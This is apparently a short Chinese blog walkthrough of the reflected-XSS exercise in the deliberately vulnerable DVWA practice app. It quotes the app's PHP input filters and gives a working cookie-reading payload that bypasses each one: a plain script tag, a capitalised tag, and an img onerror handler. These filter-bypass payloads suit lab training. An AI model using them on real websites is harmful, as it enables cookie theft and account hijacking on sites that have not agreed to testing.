DVWA - XSS (Reflected) (low, medium, high)
2017-01-06 17:18
344 查看
low
无验证,直接注入<script>alert(document.cookie)</script>
medium
查看源码发现过滤了<scrpit>标签$name = str_replace( '<script>', '', $_GET[ 'name' ] );
绕过思路:大写
<Script>alert(document.cookie)</script>
high
查看源码,可发现用正则过滤了$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );
绕过思路:标签很多,换一种标签即可。这里用img
<img src=1 onerror=alert(document.cookie)>
【这又是一个梗,感觉可以从正面绕过这个正则,路过的朋友指教一下,thank you!】
注:谷歌浏览器默认配置是不会执行alert的,可换其他浏览器测试。
相关文章推荐
- DVWA - XSS (Stored) (low, medium, high)
- DVWA - SQL Injection (low, medium, high)
- DVWA - Brute Force (low, medium, high)
- DVWA - Command Injection (low, medium, high)
- DVWA - CSRF (low, medium, high)
- DVWA - File Inclusion (low, medium, high)
- DVWA - File Upload (low, medium, high)
- DVWA的使用5–XSS(Reflected)(反射型跨站脚本)
- DVWA-1.9全级别教程之XSS(Reflected)&XSS(Stored)
- Codeforces Round #437 (Div. 2 E. Buy Low Sell High 先买后卖 贪心
- Codeforces Round #437 (Div. 2) E. Buy Low Sell High
- codeforces 867 E Buy Low Sell High(优先队列)
- codeforces865D - Buy Low Sell High
- DVWA系列之20 反射型XSS分析
- DVWA系列之21 存储型XSS分析与利用
- DVWA系列之22 low级别上传漏洞
- user_tab_col_ststistics (low_value,high_value)
- DVWA - SQL Injection (Blind) (low)
- Reflected Cross Site Scripting (XSS)
- Codeforces Round #437 (Div. 2 E. Buy Low Sell High 先买后卖 贪心